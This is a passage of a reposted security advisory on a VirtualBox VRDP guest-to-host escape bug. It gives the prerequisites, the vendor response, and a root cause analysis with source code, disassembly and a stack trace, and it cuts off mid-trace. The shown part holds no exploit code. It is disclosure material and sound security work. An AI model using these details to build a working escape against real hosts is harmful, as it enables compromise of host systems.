{"id":13153,"date":"2018-08-20T14:19:06","date_gmt":"2018-08-20T22:19:06","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2018\/08\/20\/news-6920\/"},"modified":"2018-08-20T14:19:06","modified_gmt":"2018-08-20T22:19:06","slug":"news-6920","status":"publish","type":"post","link":"http:\/\/www.palada.net\/index.php\/2018\/08\/20\/news-6920\/","title":{"rendered":"SSD Advisory \u2013 VirtualBox VRDP Guest-to-Host Escape"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Ori Nimron| Date: Mon, 20 Aug 2018 06:00:52 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> VirtualBox has a built-in RDP server which provides access to a guest machine. While the RDP client sees the guest OS, the RDP server runs on the host OS. Therefore, to view the guest OS the RDP client will make a connection to the host OS IP address rather than the guest OS IP address.<\/p>\n<p>The VRDP server is composted of two parts: a high level, which is open source and residing in the VirtualBox source tree, and is responsible for the display management, and a low level shipped with Extension Pack which is the RDP server which conforms to RDP specifications.<\/p>\n<p>The vulnerability is in the high level part. The vulnerability can be triggered when a connection to a Windows guest OS is closed, i.e. when we close the window of the RDP client application like rdesktop or Microsoft Remote Desktop.<\/p>\n<p>While the crashing bug was reported to the VirtualBox tracker (https:\/\/www.virtualbox.org\/ticket\/16444), it was never considered a security vulnerability, and is not marked as one. This ticket is 15 months old at the time of writing this post and still marked as unresolved.<\/p>\n<p>Prerequisites to exploit the vulnerability:<\/p>\n<ul>\n<li>VirtualBox Extension Pack installed on a host. It&#8217;s required to enable VRDP server<\/li>\n<li>VRDP server enabled<\/li>\n<li>3D acceleration enabled<\/li>\n<li>Windows 10 as a guest<\/li>\n<\/ul>\n<p>The vulnerability can probably be triggered from other guest OS due to the fact the the vulnerable code resides inside the Guest Additions driver.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Sergey\u00a0Zelenyuk, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<br \/> <span id=\"more-3736\"><\/span><br \/> <strong>Affected systems<\/strong><br \/> VirtualBox version 5.2.10<\/p>\n<p><strong>Vendor response<\/strong><br \/> We reported this vulnerability to Oracle, the latest update from them is that they are still looking into it, while in fact the latest version of Oracle VirtualBox version 5.2.18 has silently introduced a patch without giving credit or mentioning of the vulnerability report. We do not know at this time if this fix was intentional (to fix our report) or done for some other reason, the change log does mention: &#8220;VRDP: fixed VM process termination on RDP client disconnect if 3D is enabled for the virtual machine&#8221;.<\/p>\n<p><b>Vulnerability Analysis<\/b><br \/> <i>General analysis<\/i><br \/> The vulnerability consists of two parts: a type confusion and a UAF. It&#8217;s not clear which of them is a bug and which one was the developer&#8217;s intention. We will discuss them separately later in subsection Root Cause Analysis.<\/p>\n<p>Starting from the end, when RDP connection is being closed we gain control at the following place in \/VirtualBox-5.2.8\/src\/VBox\/Main\/src-client\/ConsoleVRDPServer.cpp file, line 1994:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f498402605452\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> \/* static *\/ DECLCALLBACK(void) ConsoleVRDPServer::H3DORVisibleRegion(void *H3DORInstance, uint32_t cRects, const RTRECT *paRects)  {      H3DORLOG((&#8220;H3DORVisibleRegion: ins %p %dn&#8221;, H3DORInstance, cRects));        H3DORInstance *p = (H3DORInstance *)H3DORInstance;      Assert(p);      Assert(p-&gt;pThis);        if (cRects == 0)      {          &#8230;      }      else      {          p-&gt;pThis-&gt;m_interfaceImage.VRDEImageRegionSet (p-&gt;hImageBitmap,                                                         cRects,                                                         paRects);      }        H3DORLOG((&#8220;H3DORVisibleRegion: ins %p completedn&#8221;, H3DORInstance));  }<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0033 seconds] -->  <\/p>\n<p>The corresponding assembly is in VBoxC.so library:<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f4ab992475133\" class=\"crayon-syntax crayon-theme-sublime-text crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> .text:0000000000100DF0 ; void __fastcall ConsoleVRDPServer::H3DORVisibleRegion(void *H3DORInstance, uint32_t cRects, const void *paRects)  .text:0000000000100DF0 ConsoleVRDPServer__H3DORVisibleRegion proc near  .text:0000000000100DF0  .text:0000000000100DF0  .text:0000000000100DF0 var_10          = dword ptr -10h  .text:0000000000100DF0 var_C           = dword ptr -0Ch  .text:0000000000100DF0 var_8           = dword ptr -8  .text:0000000000100DF0 var_4           = dword ptr -4  .text:0000000000100DF0  .text:0000000000100DF0 ; __unwind {  .text:0000000000100DF0                 push    rbp  .text:0000000000100DF1                 mov     rax, rdi  .text:0000000000100DF4                 mov     rbp, rsp  .text:0000000000100DF7                 sub     rsp, 10h  .text:0000000000100DFB                 test    esi, esi  .text:0000000000100DFD                 jz      short loc_100E10  .text:0000000000100DFF                 mov     rax, [rax]  .text:0000000000100E02                 mov     rdi, [rdi+8]  .text:0000000000100E06                 call    qword ptr [rax+320h]  .text:0000000000100E0C                 leave  .text:0000000000100E0D                 retn<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ab992475133-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ab992475133-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ab992475133-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ab992475133-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ab992475133-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ab992475133-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ab992475133-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ab992475133-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ab992475133-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ab992475133-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ab992475133-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ab992475133-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ab992475133-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ab992475133-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ab992475133-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ab992475133-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ab992475133-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ab992475133-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ab992475133-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5b7b3e582f4ab992475133-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5b7b3e582f4ab992475133-21\">21<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ab992475133-1\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DF0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">__fastcall <\/span><span class=\"crayon-v\">ConsoleVRDPServer<\/span><span class=\"crayon-o\">::<\/span><span class=\"crayon-e\">H3DORVisibleRegion<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">H3DORInstance<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">uint32_t <\/span><span class=\"crayon-v\">cRects<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-m\">const<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">void<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-v\">paRects<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ab992475133-2\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DF0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ConsoleVRDPServer__H3DORVisibleRegion <\/span><span class=\"crayon-e\">proc <\/span><span class=\"crayon-i\">near<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ab992475133-3\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DF0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ab992475133-4\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DF0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ab992475133-5\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DF0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">var_10<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dword <\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">10h<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ab992475133-6\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DF0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">var_C<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dword <\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">0Ch<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ab992475133-7\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DF0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">var_8<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dword <\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">8<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ab992475133-8\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DF0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">var_4<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dword <\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-cn\">4<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ab992475133-9\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DF0<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ab992475133-10\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DF0<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">__unwind<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ab992475133-11\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DF0<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">push&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">rbp<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ab992475133-12\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DF1<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">rdi<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ab992475133-13\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DF4<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">rbp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">rsp<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ab992475133-14\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DF7<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">sub&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">rsp<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">10h<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ab992475133-15\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DFB<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">test&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">esi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">esi<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ab992475133-16\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DFD<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">jz&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-t\">short<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">loc<\/span><span class=\"crayon-sy\">_<\/span>100E10<\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ab992475133-17\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100DFF<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ab992475133-18\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100E02<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">mov&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">rdi<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rdi<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">8<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ab992475133-19\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100E06<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-e\">call&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">qword <\/span><span class=\"crayon-i\">ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">rax<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-cn\">320h<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5b7b3e582f4ab992475133-20\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100E0C<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-i\">leave<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5b7b3e582f4ab992475133-21\"><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">0000000000100E0D<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-v\">retn<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0054 seconds] -->  <\/p>\n<p><b>Root Cause Analysis<\/b><br \/> Stopping at ConsoleVRDPServer::H3DORVisibleRegion we get a stack trace (here we use binaries with symbols compiled by us rather than those downloaded from VirtualBox website):<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5b7b3e582f4b3589652091\" class=\"crayon-syntax crayon-theme-secrets-of-rock crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #0  ConsoleVRDPServer::H3DORVisibleRegion (H3DORInstance=0x7f7db9817190, cRects=0x1, paRects=0x7f7db9ccad20) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/Main\/src-client\/ConsoleVRDPServer.cpp:1996  #1  0x00007f7dcc1f0298 in CrFbDisplayVrdp::vrdpRegions (this=0x7f7db91fdf90, pFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, hEntry=0x7f7dcd079dc0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_vrdp.cpp:255  #2  0x00007f7dcc1efddd in CrFbDisplayVrdp::EntryRemoved (this=0x7f7db91fdf90, pFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, hEntry=0x7f7dcd079dc0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_vrdp.cpp:116  #3  0x00007f7dcc1f4e40 in CrFbDisplayBase::fbCleanupRemoveAllEntries (this=0x7f7db91fdf90) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_base.cpp:323  #4  0x00007f7dcc1f0024 in CrFbDisplayVrdp::fbCleanup (this=0x7f7db91fdf90) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_vrdp.cpp:193  #5  0x00007f7dcc1f4808 in CrFbDisplayBase::setFramebuffer (this=0x7f7db91fdf90, pFb=0x0) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_base.cpp:97  #6  0x00007f7dcc1f3ab1 in CrFbDisplayComposite::remove (this=0x7f7db92702b0, pDisplay=0x7f7db91fdf90, fCleanupDisplay=0x1) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/display_composite.cpp:67  #7  0x00007f7dcc1cf823 in crPMgrFbDisconnectDisplay (hFb=0x7f7dcc5173f8 &lt;g_CrPresenter+4152&gt;, pDp=0x7f7db91fdf90) at \/home\/user\/src\/VirtualBox-5.2.8\/src\/VBox\/HostServices\/SharedOpenGL\/crserverlib\/presenter\/server_presenter.cpp:2008  #8  0x00007f7dcc1d02cf 